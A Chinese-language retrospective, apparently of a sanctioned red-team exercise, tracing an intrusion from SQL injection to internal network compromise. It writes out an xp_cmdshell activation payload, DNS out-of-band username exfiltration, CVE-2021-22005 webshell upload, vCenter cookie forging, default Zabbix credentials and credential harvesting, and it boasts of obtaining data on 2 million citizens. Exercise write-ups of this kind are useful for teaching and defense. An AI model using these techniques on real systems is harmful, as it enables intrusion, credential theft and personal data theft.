某市级HW复盘总结

admin 2023年8月8日00:40:59评论98 views字数 2428阅读8分5秒阅读模式

本文章是某市级HW的复盘总结,主要分享内网的一些打法以及思路,文中内容已做脱敏处理。文章所发的工具均来自互联网收集,请勿使用于非法测试。

文中部分工具请关注微信公众号“极致攻防实验室”回复关键字获取。

外网打点

年轻人不必讲武德,上来就是信息收集组合拳,域名收集+端口扫描+指纹识别。运气很好,发现了很多资产,有泛微、用友,先使用OA漏洞工具扫一遍,无果。再手动测试最新的漏洞POC,可惜,一个洞都没有。既然手上没有day,那就老老实实做一个安服仔渗透测试吧。

某市级HW复盘总结

OA漏洞扫描工具:关注公众号,后台回复"oascanner"获取。

历经一个上午,终于,发现一处后台登录的sql注入,直接一个单引号就抛出异常,双单引号即可闭合。推荐一个sql注入的burp插件(xia_sql),自动对所有参数添加单引号判断是否存在异常。

接下来直接将数据包丢到sqlmap自动化测试,成功跑出了payload,支持堆叠注入,且数据库类型是MSSQL。

某市级HW复盘总结

那事情就好办了(直接一个笑脸)。这里我是一步步激活xp_cmdshell,当然可以直接sqlmap --os-shell

;execute('sp_configure "show advanced options",1')  # 将该选项的值设置为1;execute('reconfigure')                             # 保存设置;execute('sp_configure "xp_cmdshell", 1')           # 将xp_cmdshell的值设置为1;execute('reconfigure')                             # 保存设置;execute('sp_configure')                            # 查看配置;execute('xp_cmdshell "whoami"')                    # 执行系统命令

成功激活xp_cmdshell,可执行系统命令,执行ping命令

某市级HW复盘总结

收到dns请求,Windows操作系统dns带外可以使用%USERNAME%.dnslog.cn

某市级HW复盘总结

完美,上个CS玩玩。顺便做个权限维持。

某市级HW复盘总结

内网横向

信息收集

被动收集

1、判断是否处于域环境

net time /domain

某市级HW复盘总结

显然, 并不属于域内。

2、判断所属的网络环境,收集能通哪些网段

(1)查看hosts文件:C:WindowsSystem32driversetchosts,是否有域名绑定。

(2)查看网络连接:netstat -ano

(3)查看路由:route print

(4)翻文件:C:UsersAdministratorDesktop,C:UsersAdministratorDownloads,等路径

(5)脱浏览器访问记录以及保存的账号密码

脱浏览器信息工具:关注公众号,后台回复"browser"获取

主动收集

所谓主动收集,即主动发包,主动探测。这里主要依靠工具实现

(1)netspy:深信服深蓝实验室天威战队强力驱动,支持多种协议探测模式。

某市级HW复盘总结

netspy工具:关注公众号,后台回复关键字"netspy"获取

(2)kscan:具备端口扫描、协议检测、指纹识别,暴力破解等功能,这里使用它的网段探测功能。

某市级HW复盘总结

kscan工具:关注公众号,后台回复关键字"kscan"获取

内网成果

为避免被发现,扫描工具fscan稍微做个免杀,先探测入口点的C段,并只探测80,443端口,不扫描poc,且线程调至30

集权系统

Vcenter

某市级HW复盘总结

获取vcenter版本,路径/sdk/vimServiceVersions.xml

直接试试CVE-2021-22005,上传cmd webshell

某市级HW复盘总结

后续选择上传哥斯拉webshell,哥斯拉支持大文件下载。下载data.mdb文件,伪造cookie进入vcenter后台

mdb文件路径:

Linux:/storage/db/vmware-vmdir/data.mdbWindows:C:ProgramDataVMwarevCenterServerdatavmdirddata.mdb

某市级HW复盘总结

使用脚本vcenter_saml_login伪造cookie,替换浏览器的cookie,进入后台

某市级HW复盘总结

虚拟机数量真不少,发现一台未锁屏机器,于是先对这台机器做权限维持。

某市级HW复盘总结

后面进行vcenter的后利用了,通过克隆虚拟机-->以自定义的PE启动系统-->运行mimikatz读取hash或明文密码。使用密码或者hash做碰撞。

若有域控,域控机器有可能通过vcenter管控,本次未发现域控。

Zabbix

默认口令 Admin/zabbix

某市级HW复盘总结

这个版本的zabbix不能通过后台的脚本功能执行命令。

内网横下几台机器后,做好权限维持,晚上偷偷搞内网了。

其他成果

密码碰撞,只进行3389,也可以进行445端口的SMB碰撞

某市级HW复盘总结

每拿下一台windows机器,都查看下远程桌面连接记录,Xshell、secureCRT、PuTTY、MobaXterm等ssh管理工具,navicat数据库连接工具,因为往往会有保存密码的习惯。

某市级HW复盘总结

用友NC,老版本,可进行文件上传,可存在BshServlet命令执行,直接上传webshell

某市级HW复盘总结

找数据库配置文件,路径/ierp/bin/prop.xml,密码是加密的,解密获取明文密码。数据库类型一般是oracle

扫描发现了很多弱口令,SSH、MySQL、Oracle、Redis、Mongo等,类似于Oracle这种关系型数据库,可以通过调用存储过程执行系统,推荐工具MDUT,一键激活组件执行系统命令

某市级HW复盘总结

提权

某市级HW复盘总结

MDUT工具:关注公众号,后台回复关键字"mdut"获取

SSH弱口令基本是设备

某市级HW复盘总结

连上每一个数据库,都翻看是否存在敏感信息,按现在HW规则,数据分尤为重要。

200W公民敏感数据,够吃一顿的了。

某市级HW复盘总结

再加上一些后台的弱口令,nacos等

某市级HW复盘总结

按照得分规则,将每一项得分点打满则点到为止。找了几个段没找到域控,安服仔打DC的梦再次破碎......

总结

1、集权系统未做好网络隔离,内网存在大量弱口令,服务器账号密码复用。

2、服务器不安装杀毒软件或者终端管控EDR。

原文始发于微信公众号(极致攻防实验室):某市级HW复盘总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月8日00:40:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某市级HW复盘总结http://cn-sec.com/archives/1939481.html

发表评论

匿名网友 填写信息